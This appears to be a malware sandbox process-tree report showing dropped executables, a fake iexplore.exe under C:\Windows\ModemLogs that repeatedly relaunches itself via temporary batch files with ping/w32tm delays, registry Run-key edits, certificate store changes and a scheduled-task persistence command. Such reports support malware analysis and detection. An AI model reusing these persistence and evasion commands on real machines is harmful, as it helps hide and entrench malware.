C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:1532
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:4508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:880
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:3492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\341332466.exeC:\Users\Admin\AppData\Local\Temp\341332466.exe5⤵
- Executes dropped EXE
PID:3316
-
-
C:\Users\Admin\AppData\Local\Temp\636524000.exeC:\Users\Admin\AppData\Local\Temp\636524000.exe5⤵
- Executes dropped EXE
PID:2372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2252
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cvv.exe"C:\Users\Admin\AppData\Local\Temp\Files\cvv.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4256 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\MsChainWinSavesNet\JeuoTlIUFkP0JKjwMjJhvZCUZE7ZSPu8lUVQg7epfUxIOeMqBpEL003n4zid.vbe"4⤵PID:4996
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\MsChainWinSavesNet\XeIJVXsH711dt3nzNM5xE4hYJepTgAq4zgx4OrxOJ6bMlIST.bat" "5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4780 -
C:\MsChainWinSavesNet\intosvc.exe"C:\MsChainWinSavesNet/intosvc.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3192 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SfrjA2QOhh.bat"7⤵PID:2708
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:2180
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:2556
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies system certificate store
PID:2968 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nXpNUGu1Ke.bat"9⤵PID:1276
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:1776
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:210⤵PID:1844
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"10⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4412 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aKt4VVYkRN.bat"11⤵PID:4132
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:4552
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:212⤵PID:2112
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"12⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qJsMcbRTCu.bat"13⤵PID:4668
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:1936
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2948
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"14⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:604 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3fMcktfRG2.bat"15⤵PID:1452
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:4800
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5000
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"16⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2592 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TipjmLA2pW.bat"17⤵PID:4544
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:3852
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3920
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"18⤵
- Checks whether UAC is enabled
PID:2992 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jsWIkAYgpB.bat"19⤵PID:4292
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:2004
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4412
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"20⤵
- Checks whether UAC is enabled
PID:5012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lRXC83nrKa.bat"21⤵PID:4768
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:1116
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2480
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"22⤵
- Checks whether UAC is enabled
PID:3680 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DqZM2URRQk.bat"23⤵PID:768
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:604
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3892
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"24⤵
- Checks whether UAC is enabled
PID:4696 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\thAzAlBiSC.bat"25⤵PID:2548
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:1348
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:226⤵PID:4552
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"26⤵
- Checks whether UAC is enabled
- Modifies system certificate store
PID:1964 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qTmai1Dpby.bat"27⤵PID:4092
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:3504
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:228⤵PID:4704
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"28⤵
- Checks whether UAC is enabled
PID:3044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZXPLL9zJFP.bat"29⤵PID:3028
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:808
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2180
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"30⤵
- Checks whether UAC is enabled
PID:4660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\R0he2Lr4l7.bat"31⤵PID:4280
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:4864
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:232⤵PID:4940
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"32⤵
- Checks whether UAC is enabled
PID:6032 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iEW5dCkeha.bat"33⤵PID:2564
-
C:\Windows\system32\chcp.comchcp 6500134⤵PID:3132
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3084
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"34⤵
- Blocklisted process makes network request
- Checks whether UAC is enabled
PID:4396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AwnSXulrEi.bat"35⤵PID:4856
-
C:\Windows\system32\chcp.comchcp 6500136⤵PID:5152
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:236⤵PID:1592
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"36⤵
- Blocklisted process makes network request
- Checks whether UAC is enabled
PID:2068 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\W1ZleRNNoI.bat"37⤵PID:6000
-
C:\Windows\system32\chcp.comchcp 6500138⤵PID:5252
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost38⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1384
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"38⤵
- Checks whether UAC is enabled
PID:6060 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nSTk4tfYD6.bat"39⤵PID:5988
-
C:\Windows\system32\chcp.comchcp 6500140⤵PID:2444
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost40⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5128
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"40⤵
- Checks whether UAC is enabled
PID:5436 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\04ySO8WbXQ.bat"41⤵PID:4856
-
C:\Windows\system32\chcp.comchcp 6500142⤵PID:5948
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost42⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6016
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"42⤵
- Checks whether UAC is enabled
PID:2444 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wle9X4LEtL.bat"43⤵PID:600
-
C:\Windows\system32\chcp.comchcp 6500144⤵PID:3216
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost44⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3816
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"44⤵PID:2672
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yWxYzFHQ21.bat"45⤵PID:2068
-
C:\Windows\system32\chcp.comchcp 6500146⤵PID:5644
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:246⤵PID:4396
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"46⤵PID:5132
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UJeeA8Mqtp.bat"47⤵PID:5672
-
C:\Windows\system32\chcp.comchcp 6500148⤵PID:3448
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost48⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4616
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"48⤵PID:2780
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5kD435lcwQ.bat"49⤵PID:1524
-
C:\Windows\system32\chcp.comchcp 6500150⤵PID:6132
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost50⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5928
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"50⤵PID:1696
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rln2uypvqA.bat"51⤵PID:6128
-
C:\Windows\system32\chcp.comchcp 6500152⤵PID:5728
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:252⤵PID:3208
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"52⤵PID:1944
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VkZKSVlIY6.bat"53⤵PID:2352
-
C:\Windows\system32\chcp.comchcp 6500154⤵PID:5456
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:254⤵PID:1224
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"54⤵PID:1496
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Kg5VX99QjA.bat"55⤵PID:2668
-
C:\Windows\system32\chcp.comchcp 6500156⤵PID:1820
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost56⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4356
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"56⤵PID:2900
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\M7ZRnUVt3i.bat"57⤵PID:3104
-
C:\Windows\system32\chcp.comchcp 6500158⤵PID:5008
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:258⤵PID:3620
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"58⤵PID:4288
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jAyUy8CkP5.bat"59⤵PID:5440
-
C:\Windows\system32\chcp.comchcp 6500160⤵PID:5432
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:260⤵PID:5436
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"60⤵PID:6028
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\pKJ6edTRWc.bat"61⤵PID:4396
-
C:\Windows\system32\chcp.comchcp 6500162⤵PID:1696
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost62⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4344
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"62⤵PID:2940
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6gfTO1Diev.bat"63⤵PID:552
-
C:\Windows\system32\chcp.comchcp 6500164⤵PID:2356
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:264⤵PID:4744
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"64⤵PID:4424
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lkMeKtMa8h.bat"65⤵PID:816
-
C:\Windows\system32\chcp.comchcp 6500166⤵PID:3544
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:266⤵PID:2652
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"66⤵PID:4480
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3Z0zJXQy9U.bat"67⤵PID:2776
-
C:\Windows\system32\chcp.comchcp 6500168⤵PID:3420
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost68⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3272
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"68⤵PID:5164
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Phxc9FejmL.bat"69⤵PID:2144
-
C:\Windows\system32\chcp.comchcp 6500170⤵PID:4068
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:270⤵PID:1452
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"70⤵PID:2636
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lOMsQrAcGI.bat"71⤵PID:1384
-
C:\Windows\system32\chcp.comchcp 6500172⤵PID:6060
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:272⤵PID:4292
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"72⤵PID:4248
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bqMLTwU6O8.bat"73⤵PID:5420
-
C:\Windows\system32\chcp.comchcp 6500174⤵PID:3872
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost74⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3908
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"74⤵PID:740
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3D0DQVE0G5.bat"75⤵PID:2104
-
C:\Windows\system32\chcp.comchcp 6500176⤵PID:1684
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost76⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3880
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"76⤵PID:3544
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ec6WH18BjC.bat"77⤵PID:4292
-
C:\Windows\system32\chcp.comchcp 6500178⤵PID:3320
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost78⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4244
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"78⤵PID:5100
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Fp8c0TPT53.bat"79⤵PID:4240
-
C:\Windows\system32\chcp.comchcp 6500180⤵PID:3284
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost80⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4744
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"80⤵PID:2384
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Tx5bI8CrM8.bat"81⤵PID:5128
-
C:\Windows\system32\chcp.comchcp 6500182⤵PID:2640
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:282⤵PID:740
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"82⤵PID:5732
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tkLJtwnwVT.bat"83⤵PID:2308
-
C:\Windows\system32\chcp.comchcp 6500184⤵PID:4868
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:284⤵PID:1444
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"84⤵PID:2416
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1kLxRzFJtF.bat"85⤵PID:3560
-
C:\Windows\system32\chcp.comchcp 6500186⤵PID:1988
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:286⤵PID:4424
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"86⤵PID:3540
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Auc8oj9cAR.bat"87⤵PID:3772
-
C:\Windows\system32\chcp.comchcp 6500188⤵PID:5016
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:288⤵PID:2756
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"88⤵PID:2412
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kTLD8xjVtV.bat"89⤵PID:4984
-
C:\Windows\system32\chcp.comchcp 6500190⤵PID:4840
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost90⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4428
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"90⤵PID:5640
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\336zK5Rer1.bat"91⤵PID:1444
-
C:\Windows\system32\chcp.comchcp 6500192⤵PID:4728
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:292⤵PID:3436
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"92⤵PID:4412
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mw0T6TjCGL.bat"93⤵PID:1844
-
C:\Windows\system32\chcp.comchcp 6500194⤵PID:2660
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:294⤵PID:2096
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"94⤵PID:4148
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b2RsHXtgrT.bat"95⤵PID:2812
-
C:\Windows\system32\chcp.comchcp 6500196⤵PID:3020
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:296⤵PID:5100
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"96⤵PID:568
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RVEN4vvioM.bat"97⤵PID:2424
-
C:\Windows\system32\chcp.comchcp 6500198⤵PID:808
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost98⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3744
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"98⤵PID:3964
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bsXeB76KRP.bat"99⤵PID:5560
-
C:\Windows\system32\chcp.comchcp 65001100⤵PID:2668
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost100⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4812
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"100⤵PID:5396
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DK6554V6Uz.bat"101⤵PID:4868
-
C:\Windows\system32\chcp.comchcp 65001102⤵PID:1532
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost102⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4620
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"102⤵PID:2692
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kE5LbAifMs.bat"103⤵PID:4292
-
C:\Windows\system32\chcp.comchcp 65001104⤵PID:292
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost104⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2096
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"104⤵PID:3220
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wWOI1HKPNj.bat"105⤵PID:2608
-
C:\Windows\system32\chcp.comchcp 65001106⤵PID:2068
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2106⤵PID:3620
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"106⤵PID:3908
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AzylF6O5Hz.bat"107⤵PID:580
-
C:\Windows\system32\chcp.comchcp 65001108⤵PID:4272
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost108⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5012
-
-
C:\Windows\ModemLogs\iexplore.exe"C:\Windows\ModemLogs\iexplore.exe"108⤵PID:2576
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7ar6wdwHCe.bat"109⤵PID:3184
-
C:\Windows\system32\chcp.comchcp 65001110⤵PID:6012
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2110⤵PID:5336
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\zxcv.exe"C:\Users\Admin\AppData\Local\Temp\Files\zxcv.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4836 -
C:\Users\Admin\AppData\Local\Temp\Files\zxcv.exe"C:\Users\Admin\AppData\Local\Temp\Files\zxcv.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4548 -
C:\Users\Admin\AppData\Roaming\SD4KMyi59u.exe"C:\Users\Admin\AppData\Roaming\SD4KMyi59u.exe"5⤵
- Executes dropped EXE
PID:2000
-
-
C:\Users\Admin\AppData\Roaming\AUaFgs70Om.exe"C:\Users\Admin\AppData\Roaming\AUaFgs70Om.exe"5⤵
- Executes dropped EXE
PID:5116
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 964⤵
- Loads dropped DLL
- Program crash
PID:2692
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hashed.exe"C:\Users\Admin\AppData\Local\Temp\Files\hashed.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3744 -
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵PID:3600
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
